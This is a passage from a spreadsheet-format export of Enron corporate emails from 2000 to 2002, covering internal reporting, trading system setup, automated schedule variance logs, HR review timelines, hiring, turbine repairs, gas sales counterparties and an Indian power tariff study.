_x000D_
Additional Password Information_x000D_
1.  Passwords cannot be reused once changed_x000D_
2.  Passwords are set to expire every 90 days_x000D_
_x000D_
_x000D_
If you have any questions or problems logging in, please call the ISC Customer Care Center at 713-345-4727.</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 03:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marcie.milner@enron.com', 'mona.petrochko@enron.com', 'jeff.dasovich@enron.com', 'sandra.mccubbin@enron.com', 'susan.mara@enron.com'})</t>
  </si>
  <si>
    <t>Re: Monthly Update Report for ENA Management</t>
  </si>
  <si>
    <t xml:space="preserve">Jim's e-mail makes it clear that we need to be a bit more specific on our _x000D_
internal resource reports.    In other words, let's identify where we are _x000D_
assisting ENA on specific projects or transactions.   For example, if we're _x000D_
working on a QF acquisition, then let's identify the project by name so Jim _x000D_
can inform Dave D. that we are helping ENA._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Paul Kaufman/PDX/ECT on 09/18/2000 10:39 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
James D Steffes@EES_x000D_
09/18/2000 10:27 AM_x000D_
To: Paul Kaufman/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Monthly Update Report for ENA Management  _x000D_
_x000D_
Yes._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
Paul Kaufman@ECT_x000D_
09/18/2000 10:58 AM_x000D_
To: James D Steffes/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: Monthly Update Report for ENA Management  _x000D_
_x000D_
What's the IRTF?  Is that the internal resource report?  _x000D_
_x000D_
_x000D_
_x000D_
James D Steffes@EES_x000D_
09/11/2000 03:42 PM_x000D_
To: Steve Montovano/DUB/EES@EES, Paul Kaufman/PDX/ECT@ECT, Janine _x000D_
Migden/DUB/EES@EES, Robin Kittel/HOU/EES@EES, Joe Hartsoe/Corp/Enron@ENRON, _x000D_
Joe Hillings/Corp/Enron@ENRON_x000D_
cc: Richard Shapiro/HOU/EES@EES, Ginger Dernehl/NA/Enron@Enron _x000D_
Subject: Monthly Update Report for ENA Management_x000D_
_x000D_
Attached please find the monthly report I file to Dave Delainey (CEO of _x000D_
ENA).  I've attached the Sept 2000 report.  _x000D_
_x000D_
Currently I use the IRTF to update this information.  It is critical that _x000D_
everyone submit these forms by the 1st of the month so that I can get this to _x000D_
Dave by the 5th.  If you want to give me this information in a different _x000D_
form, please feel free.  This is a good way to keep EGA in front of the _x000D_
business people.  The better the information you send me the better the _x000D_
report._x000D_
_x000D_
If anyone has any questions, please feel free to call me.  I know that _x000D_
everything is not on the list, only things that have a key focus on ENA._x000D_
_x000D_
Jim_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 5 Sep 2001 16:24:21 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Multiple Stack Manager</t>
  </si>
  <si>
    <t>Torrey,_x000D_
_x000D_
The latter sounds like a great option, so please set up a second Stack Manager ID for Rob so that he can maintain two distinct stacks.  All trades on both stacks should go to his EPMI-LT-PJM book regardless of which stack ID is used._x000D_
_x000D_
Let me know if you need additional information, and thanks so much for your help!_x000D_
Casey_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Moorer, Torrey  _x000D_
Sent:	Friday, August  31, 2001 9:14 AM_x000D_
To:	Evans, Casey_x000D_
Cc:	Benson, Robert; Sever, Stephanie; Lees, Lisa_x000D_
Subject:	RE: Multiple Stack Manager_x000D_
_x000D_
Casey,_x000D_
_x000D_
Using one login ID, Bob can open two seperate Stack Manager windows on two PCs and set up different product filters on each for purposes of managing his different regions. The only drawback here is that whichever stack he closes last will save the product defaults and he will have to set up his seperate breakout for the other region each time he logs in (a proces that may take a minute or two depending on how many products he is managing)._x000D_
_x000D_
To avoid this, we could set him up with a second Stack Manager ID and he could simply maintain two distinct stacks. If he would like a second Stack Manager ID, just let me know and I will forward the request to Stephanie Sever for setup._x000D_
_x000D_
Thanks,_x000D_
Torrey_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Evans, Casey  _x000D_
Sent:	Thursday, August 30, 2001 4:45 PM_x000D_
To:	Moorer, Torrey_x000D_
Cc:	Benson, Robert_x000D_
Subject:	Multiple Stack Manager_x000D_
_x000D_
Torrey,_x000D_
_x000D_
Rob Benson is currently trading two general power regions (PJM and New York) under one EOL ID.  He manages one stack manager of which all deals are mapped to his EPMI-LT-PJM book.  He would like to create an additional stack manager so that he can divide the two regions into their own stack and manage them on separate screens.  All of the deals would continue to go into the LT-PJM book.  Let me know if this would be doable and what I need to do on my side to help out._x000D_
_x000D_
Thanks!_x000D_
Casey</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 14:42:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/19/01; HourAhead hour: 22;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/19/01; HourAhead hour: 22;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1922.txt_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 22 / Preferred: -700.00 / Final: -699.21)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/19/01_x000D_
  TRADING_SC: WESC_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 1_x000D_
  DEAL_NO: 1_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 22 / Preferred:  50.91 / Final:  50.12)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE3_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/19/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Sep 2000 04:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Talisman</t>
  </si>
  <si>
    <t>Are you shutting down their trading today?</t>
  </si>
  <si>
    <t>Mon, 19 Nov 2001 09:13:40 -0800 (PST)</t>
  </si>
  <si>
    <t>ETS Year-end Performance Evaluation Process</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The year-end performance evaluation process is a great opportunity for employees and their supervisors to review accomplishments for the year and identify opportunities for personal growth.  Additionally, it is an opportunity for each of us to provide meaningful performance feedback to help others.  This memo is intended to summarize the major elements of this important process and clarify the timeline for year-end 2001._x000D_
_x000D_
(Note: ETS employees on self-directed work teams that participate in the Skill-based Pay program will complete team and peer performance reviews as they have in the past and are exempted from the discussion that follows.)_x000D_
_x000D_
Feedback and Evaluation_x000D_
Employees will solicit 360? feedback on their performance via the PEP system. The supervisor will use this feedback, along with other performance data about the employee, to prepare a written evaluation of the employee's performance for the year.  The employee and supervisor will then meet and discuss this evaluation which provides an objective measure of the employee's performance against expectations.  The performance evaluation is an opportunity to discuss accomplishments, areas for improvement and goals for the next year.  No overall performance rating will be designated._x000D_
_x000D_
?	PEP System open for feedback			November 19 - December 7_x000D_
?	Performance discussions with supervisor	December 10 - January 14_x000D_
?	Written evaluations due to HR			January 15_x000D_
_x000D_
Training for all employees on how to use the PEP system will be available via online tutorials._x000D_
_x000D_
Compensation_x000D_
Increases in an employee's base pay for merit, promotion or equity can be recommended by an individual supervisor based on the employee's performance, current responsibilities and salary.  Division Head approval is required._x000D_
_x000D_
As always, incentive awards are paid at the discretion of the Enron Board Compensation Committee and the Enron Office of the Chairman based on company and business unit performance. Once bonus pools are approved, individual bonuses will be determined by division and department heads based on employee performance._x000D_
_x000D_
Relative Talent Reviews_x000D_
Relative talent reviews will occur beginning January 16, 2002 and will include discussions of Managers and above.  The focus is not on relative ranking but on identifying employees who best demonstrate the performance, skills and behaviors that are valued at Enron.  Each Division will identify its top 10% and discuss the utilization of its top talent.  Employees who may be ready to assume greater responsibilities will be discussed.  Recommendations for promotions will be considered up through Senior Director.  EGS executive management will review Vice Presidents and Managing Directors and identify the top 10% in this officer group.  Nomination for promotions to Vice President and Managing Director levels will be made to the Enron Management Committee, which will make final decisions on these promotions._x000D_
_x000D_
If you have any questions about any aspect of this year-end process, I encourage you to contact your HR representative._x000D_
_x000D_
Gary_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 23:38:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 10/18/01; HourAhead hour: 2;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 10/18/01; HourAhead hour: 2;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2001101802.txt_x000D_
_x000D_
Error retrieving HourAhead price data - process continuing...</t>
  </si>
  <si>
    <t>Sat, 17 Nov 2001 04:38:15 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'alex@pira.com'})</t>
  </si>
  <si>
    <t>PIRA's Electricity Daily Demand Forecast 11/17/01</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is PIRA's latest "Electricity Daily Demand Forecast."_x000D_
_x000D_
If you have any questions regarding the report's content, please contact_x000D_
Morris Greenberg (email: morris@pira.com) or Victoria Watkins (email:_x000D_
vwatkins@pira.com), at (212) 686-6808._x000D_
_x000D_
Contact Client Services regarding PIRA report distribution and address_x000D_
changes at (212) 686-6808, email: support@pira.com._x000D_
_x000D_
NOTE: Circulation of the "Electricity Daily Demand Forecast" outside a_x000D_
Client's licensed distribution area is strictly prohibited. Clients that_x000D_
are unsure of their licensed distribution or require an extension of_x000D_
their current license should contact their PIRA sales representative, or_x000D_
email to sales@pira.com._x000D_
_x000D_
PIRA Energy Group_x000D_
_x000D_
_x000D_
 - ed111701.pdf _x000D_
 - ed111701.xls </t>
  </si>
  <si>
    <t>Sat, 21 Apr 2001 23:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/22/01; HourAhead hour: 7;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/22/01; HourAhead hour: 7;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2207.txt_x000D_
_x000D_
---- Energy Import/Export Schedule ----_x000D_
$$$ Variance found in table tblINTCHG_IMPEXP._x000D_
     Details: (Hour: 7 / Preferred:  12.00 / Final:  11.98)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: ECTRT_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/22/01_x000D_
  TIE_POINT: PVERDE_5_DEVERS_x000D_
  INTERCHG_ID: EPMI_CISO_ERNIE_x000D_
  ENGY_TYPE: WHEEL_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 7 / Preferred:  55.71 / Final:  55.69)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE3_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/22/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 05:59:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>unfortunately not, what time are you leaving today</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 08:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gani@ganib.com'})</t>
  </si>
  <si>
    <t>Re: Enron</t>
  </si>
  <si>
    <t xml:space="preserve">Gani_x000D_
_x000D_
I will call you on Monday to arrange a date for a phone interview._x000D_
_x000D_
Thank You_x000D_
Hunter Shively_x000D_
---------------------- Forwarded by Hunter S Shively/HOU/ECT on 10/27/2000 _x000D_
03:01 PM ---------------------------_x000D_
_x000D_
_x000D_
"Gani B" &lt;Gani@ganib.com&gt; on 10/24/2000 07:26:47 PM_x000D_
To: &lt;Hunter.S.Shively@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: Enron_x000D_
_x000D_
_x000D_
Dear Hunter Shively,_x000D_
_x000D_
I would like to speak to you regarding this position.  The best time to_x000D_
reach me is in the morning, between 9-11am EST.  I look forward to our_x000D_
conversation.  My home telephone number is 914-273-4551_x000D_
_x000D_
Thank you,_x000D_
Gani Bajraktari_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Hunter.S.Shively@enron.com&gt;_x000D_
To: &lt;gani@ganib.com&gt;_x000D_
Sent: Monday, October 23, 2000 5:05 PM_x000D_
Subject: Enron_x000D_
_x000D_
_x000D_
&gt; Gani,_x000D_
&gt;_x000D_
&gt; My name is Hunter Shively.  I work for Enron.  I would like to arrange a_x000D_
&gt; phone interview with you.  Please call me at 713-853-4772 or e-mail_x000D_
&gt; hunter.s.shively@enron.com   Please leave a message that states your phone_x000D_
&gt; number and the best time to contact you.  If you are no longer interested_x000D_
&gt; please let me know._x000D_
&gt;_x000D_
&gt; Thank You,_x000D_
&gt; Hunter_x000D_
&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Mar 2002 02:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bmgivens@aep.com'})</t>
  </si>
  <si>
    <t>Re: Data Acquisition/Flender Gearbox</t>
  </si>
  <si>
    <t xml:space="preserve">What about turbine #30 gearbox? _x000D_
_x000D_
Ben _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Kurt.Anderson@enron.com _x000D_
	_x000D_
	03/07/02 12:18 PM _x000D_
		? ? ? ?  _x000D_
		? ? ? ? To: ? ? ? ?bmgivens@aep.com, Mark.Fisher@enron.com _x000D_
		? ? ? ? cc: ? ? ? ?Bo.Thisted@enron.com, Jeff.Maurer@enron.com, _x000D_
Mike.Abbott@enron.com, Danielle.Lewis@enron.com _x000D_
		? ? ? ? Subject: ? ? ? ?Data Acquisition/Flender Gearbox_x000D_
_x000D_
_x000D_
Ben, confirming our conversation earlier today regarding the two items_x000D_
below,_x000D_
_x000D_
Mark Fisher, a Data Analyst in our Information Services group is available_x000D_
on Friday March 8, at 1:30 PST to address your questions regarding the_x000D_
downloading of data from SCADA. Mark and I will contact you in your office_x000D_
at 3:30CST._x000D_
_x000D_
Regarding the defective Eickoff gearbox on WTG #79 at Trent Mesa, today EWC_x000D_
will ship a replacement Flender gearbox to Trent Mesa from our Tehachapi_x000D_
location. It is our plan to install this gearbox in place of the defective_x000D_
Eickoff gearbox and return the turbine to operational status as soon as_x000D_
possible._x000D_
_x000D_
Regards_x000D_
_x000D_
Kurt_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate and _x000D_
may contain confidential and privileged material for the sole use of the _x000D_
intended recipient (s). Any review, use, distribution or disclosure by others _x000D_
is strictly prohibited. If you are not the intended recipient (or authorized _x000D_
to receive for the recipient), please contact the sender or reply to Enron _x000D_
Corp. at enron.messaging.administration@enron.com and delete all copies of _x000D_
the message. This e-mail (and any attachments hereto) are not intended to be _x000D_
an offer (or an acceptance) and do not create or evidence a binding and _x000D_
enforceable contract between Enron Corp. (or any of its affiliates) and the _x000D_
intended recipient or any other party, and may not be relied on by anyone as _x000D_
the basis of a contract by estoppel or otherwise. Thank you. _x000D_
**********************************************************************_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 07:02:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'karolyn.criado@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'bo.petersen@enron.com', 'michael.philips@enron.com', "paul.y'barbo@enron.com", 'philip.crumpler@enron.com', 'paul.fox@enron.com', 'frank.prejean@enron.com', 'melissa.turner@enron.com', 'lisa.walker@enron.com', 'j..leskowitz@enron.com', 'david.shields@enron.com', 'thomas.meers@enron.com', 'j..bonin@enron.com', 'kristi.donnell@enron.com', 'keynan.dutton@enron.com', 'angela.stie@enron.com', 'sally.shuler@enron.com', 'tomas.tellez@enron.com', 'ina.norman@enron.com', 'sharon.stringfellow@enron.com', 'r..lachner@enron.com', 'paula.lacour@enron.com', 'h..harrison@enron.com', 'felicia.case@enron.com', 'b..clapp@enron.com', 'mark.diedrich@enron.com', 'edward.soo@enron.com', 'tammie.davis@enron.com'})</t>
  </si>
  <si>
    <t>Price List Week of Nov. 5-9, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,_x000D_
_x000D_
I'm sorry, I forgot to send this out yesterday... please let me know if you have any questions regarding last weeks prices._x000D_
_x000D_
_x000D_
Thank you,_x000D_
Karolyn Criado_x000D_
X39441_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 18 Sep 2001 12:52:15 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.ermis@enron.com', 'matthew.lenhart@enron.com', 'mike.grigsby@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
 _x000D_
-----Original Message-----_x000D_
From: Lindner, Fred_x000D_
Sent: Tuesday, September 18, 2001 2:15 PM_x000D_
To: Thames, Colby; Cherry, Beth_x000D_
Subject: RE: _x000D_
Not the map we were looking for, but interesting nonetheless. http://www.thetimes.co.uk/picture/0,,2001320130,00.jpg _x000D_
Fred_x000D_
_x000D_
-----Original Message-----_x000D_
From: Thames, Colby_x000D_
Sent: Tuesday, September 18, 2001 11:23 AM_x000D_
To: Cherry, Beth; Lindner, Fred_x000D_
Subject: _x000D_
do you guys have a good picture of the US Map and of the Globe? If so, can you send them to me?  IT would be good if the colors matched the homepage of the website...._x000D_
Colby Thames_x000D_
Director_x000D_
713.350.1003colby.thames@enform.com _x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 03:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rick.counihan@greenmountain.com'})</t>
  </si>
  <si>
    <t>frozenset({'tah@cpuc.ca.gov', 'chris.king@utility.com', 'jean.wilson@pacificorp.com', 'john.rozsa@sen.ca.gov', 'lga@mother.com', 'rbw@mrwassoc.com', 'hwenger@astropower.com', 'djohnson@energy.state.ca.us', 'meb@cpuc.ca.gov', 'theo@ppallc.com', 'flak2@aol.com', 'mmarvin@bcse.org', 'emiller@siliconenergy.com', 'kdw@cpuc.ca.gov', 'bob@cpuc.ca.gov', 'davidmosk@aol.com', 'nancy.rivera.brooks@latimes.com', 'jeff_dasovich@enron.com', 'jackson_gualco@gualcogroup.com', 'rik@enterprisecafe.com', 'dot@cpuc.ca.gov', 'nemtzow@ase.org', 'billr@calpine.com', 'leah.bissonette@williams.com', 'arm@phaser.com', 'mflorio@turn.org', 'rcavanagh@nrdc.org', 'dabo@dynegy.com', 'dank@edf.org', 'wbyrne@forenergy.com', 'mshames@ucan.org', 'kedson@ns.net', 'rich@ceert.org', 'dmg@cpuc.ca.gov', 'jhamrin@resource-solution.org', 'gtbl@dynegy.com', 'smutny@iepa.com', 'steven@iepa.com', 'wxm@cpuc.ca.gov', 'mwingate@resource-solutions.org', 'foothi19@idt.net', 'hraitt@energy.state.ca.us', 'ssmyers@hooked.net', 'kip.lipper@sen.ca.gov', 'mlc@cpuc.ca.gov', 'vjw@ceert.org', 'rochmanm@spurr-remac.org', 'ksmith@sirius.com', 'scarter@nrdc.org', 'rroberts@repp.org', 'adiamant@utilityguide.com', 'bill@jbsenergy.com', 'mday@gmssr.com', 'mmasri@energy.state.ca.us', 'douglass@arterhadden.com', 'barrett.stambler@pacificorp.com', 'kmills@cfbf.com', 'randy_swisher@awea.org'})</t>
  </si>
  <si>
    <t>San Diego Fixed Price Product</t>
  </si>
  <si>
    <t>Dear Friends,_x000D_
_x000D_
In case you missed it last week I am circulating a press release announcing_x000D_
our new fixed rate pricing plan for the San Diego area.  8.5 cents per kWh,_x000D_
no monthly fee, 100% renewable, price guaranteed for a year._x000D_
_x000D_
As we debate how to modify the California electric market, this type of_x000D_
product structure may be a good model for small customer default service._x000D_
That is, perhaps small customers should get a fixed price, for a fixed_x000D_
period, that is known in advance, as opposed to a floating price that_x000D_
changes every month and that the customer only learns 30 days after they use_x000D_
it._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rick Counihan_x000D_
Green Mountain Energy Company_x000D_
415/439-5310 tel_x000D_
415/439-5320 fax_x000D_
rick.counihan@greenmountain.com &lt;mailto:rick.counihan@greenmountain.com&gt;_x000D_
_x000D_
_x000D_
 - Breathe Easy Release.doc</t>
  </si>
  <si>
    <t>Tue, 23 May 2000 03:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'julie.meyers@enron.com', 'cheryl.dudley@enron.com'})</t>
  </si>
  <si>
    <t>Re: ENA Sales on HPL</t>
  </si>
  <si>
    <t xml:space="preserve">Julie, _x000D_
_x000D_
What info do you have on the Praxair deal (#70171)?  Should this be on ENA or _x000D_
HPLC?_x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Cheryl D King_x000D_
	05/23/2000 09:27 AM_x000D_
	_x000D_
Sent by: Cheryl Dudley_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc: Mary M Smith/HOU/ECT@ECT _x000D_
Subject: Re: ENA Sales on HPL  _x000D_
_x000D_
Daren - thank you for the list of the true, remaining ENA sales customers.  I _x000D_
have been researching your list &amp; getting the contractual volumes that Brenda _x000D_
needs.  I am confused about Praxair though._x000D_
_x000D_
The sales contract between ENA &amp; Praxair was assigned to HPLC eff/ 10/1/99.  _x000D_
The only remaining contract between ENA &amp; Praxair is a Master Financial _x000D_
Agreement._x000D_
_x000D_
Does Praxair really need to remain under ENA or is it okay under HPLC?  If it _x000D_
really needs to be under ENA, we will need to un-do the 10/1/99 assignment to _x000D_
HPLC or set-up a new contract between ENA &amp; Praxair._x000D_
_x000D_
Please advise._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
05/11/2000 03:11 PM_x000D_
To: Cheryl Dudley/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: ENA Sales on HPL  _x000D_
_x000D_
Cheryl, _x000D_
_x000D_
The counterparties with which ENA currently sales gas are:_x000D_
_x000D_
City of Brazoria_x000D_
Central Illinois Light Company_x000D_
D &amp; H Gas Company, Inc._x000D_
Markham Gas _x000D_
Merit Energy Partners_x000D_
Praxair_x000D_
Reliant Energy - Entex_x000D_
Reliant Energy - HL&amp;P_x000D_
Southern Union Company_x000D_
Texas Utilities Fuel Company (Now TXU Fuel Co)_x000D_
Union Carbide Corporation_x000D_
Unit Gas Transmission Company Inc_x000D_
_x000D_
_x000D_
ENA has transacted with the other companies listed below, but that will most _x000D_
likely not happen again.  (HPL will trade with those counterparties.)_x000D_
_x000D_
All ENA trades on HPL will be in Sitara.  We have reports which can be _x000D_
generated out of CPR that can list all deals by counterparty for ENA.  Let me _x000D_
know if you need something like that.  _x000D_
_x000D_
Let me know if you have any other questions._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Cheryl D King_x000D_
	05/10/2000 08:42 AM_x000D_
	_x000D_
Sent by: Cheryl Dudley_x000D_
To: Brenda F Herod/HOU/ECT@ECT_x000D_
cc: Daren J Farmer/HOU/ECT@ECT, Mary M Smith/HOU/ECT@ECT _x000D_
Subject: ENA Sales on HPL_x000D_
_x000D_
Just to update you on this project's status:_x000D_
_x000D_
Based on a new report that Scott Mills ran for me from Sitara, I have come up _x000D_
with the following counterparties as the ones to which ENA is selling gas off _x000D_
of HPL's pipe._x000D_
_x000D_
Altrade Transaction, L.L.C.   Gulf Gas Utilities Company_x000D_
Brazoria, City of     Panther Pipeline, Inc._x000D_
Central Illinois Light Company   Praxair, Inc._x000D_
Central Power and Light Company  Reliant Energy - Entex_x000D_
CES - Equistar Chemicals, LP   Reliant Energy - HL&amp;P_x000D_
Central Illinois Light Company  Southern Union Company_x000D_
D &amp; H Gas Company, Inc.   Texas Utilities Fuel Company_x000D_
Duke Energy Field Services, Inc.  TXU Gas Distribution_x000D_
Entex Gas Marketing Company   Union Carbide Corporation_x000D_
Equistar Chemicals, LP    Unit Gas Transmission Company Inc._x000D_
_x000D_
_x000D_
Since I'm not sure exactly what gets entered into Sitara, Pat Clynes _x000D_
suggested that I check with Daren Farmer to make sure that I'm not missing _x000D_
something (which I did below).  While I am waiting for a response from him _x000D_
and/or Mary Smith, I will begin gathering the contractual volumes under the _x000D_
above contracts._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Cheryl Dudley/HOU/ECT on 05/10/2000 07:56 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
	Cheryl D King_x000D_
	05/08/2000 04:11 PM_x000D_
	_x000D_
Sent by: Cheryl Dudley_x000D_
To: Daren J Farmer/HOU/ECT@ECT, Mary M Smith/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: ENA Sales on HPL_x000D_
_x000D_
I am working on a project for Brenda Herod &amp; was wondering if one of you _x000D_
could tell me if I'm on the right track &amp; if this will get everything for _x000D_
which she is looking._x000D_
_x000D_
She is trying to draft a long-term transport/storage agreement between ENA &amp; _x000D_
HPLC which will allow ENA to move the gas to their markets.  In order to _x000D_
accomplish this, she needs to know all of the Sales to customers that ENA is _x000D_
doing off of HPL's pipe._x000D_
_x000D_
I had Scott Mills run a report from Sitara showing all ENA Buy/Sell Activity _x000D_
on HPL since 7/99.  If I eliminate the Buys &amp; the desk-to-desk deals, will _x000D_
this give me everything that I need?_x000D_
_x000D_
Are there buy/sell deals done with ENA on HPL's pipe that wouldn't show up in _x000D_
Sitara?  Someone mentioned something about deals where HPL transports the gas _x000D_
on it's own behalf then ENA sells it to a customer at that same spot  --  _x000D_
?????  Do deals like that happen? Would they show up in Sitara?_x000D_
_x000D_
Is there anything else that I'm missing?  I'm not real familiar with how some _x000D_
of these deals happen nowadays so am very receptive to any _x000D_
ideas/suggestions/help that you can offer !!!_x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 8 Oct 2001 04:24:54 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'reagan.mathews@enron.com'})</t>
  </si>
  <si>
    <t>FW: Freez Notis Presentation</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
_x000D_
_x000D_
Please forward this to our group as well _x000D_
 _x000D_
Thanks, _x000D_
Dave_x000D_
-----Original Message-----_x000D_
From: Moore, Kevin G. _x000D_
Sent: Friday, October 05, 2001 6:45 AM_x000D_
To: Rangel, Ina; Young, Becky; Brown, Kimberly; Hogan, Irena D.; Villarreal, Alexandra; Jones, Carmella; Coneway, Betty J._x000D_
Cc: Roberts, Mike A.; Bennett, Steve; Ryan, David; Stevens, Adam; Smith, William; Crenshaw, Shirley; Kaminski, Vince J_x000D_
Subject: FW: Freez Notis Presentation_x000D_
Importance: Low_x000D_
_x000D_
_x000D_
Good morning  ,_x000D_
 _x000D_
This is just a reminder that the Freez - Notis  presentation is coming soon._x000D_
Please, this is a presentation that your group receives information and ask questions._x000D_
Please, keep them updated and let them be aware that Monday October 8th , _x000D_
Freeez Notis will be here in the Enron Building beginning at 9: a.m._x000D_
 _x000D_
Hot Coffee ,_x000D_
Juices_x000D_
Danishes, Bagels, and fruit will be served........_x000D_
 _x000D_
                                                        Thanks_x000D_
                                                     Kevin Moore_x000D_
 _x000D_
Any questions feel free to call x34710 or come by and see me EB3240C_x000D_
Have a Wonderful Day ~!!!!_x000D_
-----Original Message-----_x000D_
From: Moore, Kevin G. _x000D_
Sent: Thursday, October 04, 2001 7:09 AM_x000D_
To: Roberts, Mike A.; Rangel, Ina; Ryan, David; Marquez, Jose; Crenshaw, Shirley; Bennett, Steve; Stevens, Adam; Young, Becky; Brown, Kimberly; Villarreal, Alexandra; Hogan, Irena D.; Coneway, Betty J.; Jones, Carmella; Presas, Jessica; Hardy, Kimberly_x000D_
Cc: Kaminski, Vince J_x000D_
Subject: Freez Notis Presentation_x000D_
Importance: Low_x000D_
_x000D_
_x000D_
_x000D_
                                                   _x000D_
                        Freez- Notis  Presentation_x000D_
_x000D_
                                                      Winter Outlook_x000D_
_x000D_
 _x000D_
_x000D_
When  : October  8th, 2001_x000D_
_x000D_
Time   :  9:00 a.m._x000D_
_x000D_
Location  -  EB32C2_x000D_
_x000D_
 _x000D_
_x000D_
Please asst , inform your groups ........_x000D_
_x000D_
more info...comimg soon._x000D_
_x000D_
                                           Thanks_x000D_
_x000D_
                                       Kevin Moore</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 05:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rajesh.sivaraman@enron.com', 'neil.mcgregor@enron.com', 'jimmy.mogal@enron.com', 'sanjeev.khandekar@enron.com', 'mukesh.tyagi@enron.com', 'paul.kraske@enron.com', 'wade.cline@enron.com', 'mohan.gurunath@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>MSEB Cash Flow and Tariff after 5 year hiatus</t>
  </si>
  <si>
    <t xml:space="preserve">Attached below please find the cash flow/tariff increase study we discussed 2 _x000D_
1/2 weeks ago at the Sunday DPC strategy session.  The study assumes a _x000D_
decrease in losses from 40% to 25% and an increase in collection efficiency _x000D_
83% to 92% from 2000-01 to 2006-07.  Further, it is assumed that only one _x000D_
block of DPC operates until 2006-07.  _x000D_
_x000D_
Two scenarios based on average realisation are illustrated:_x000D_
_x000D_
1. A realistic cash flow study and  accompanying tariffs.  Given the above _x000D_
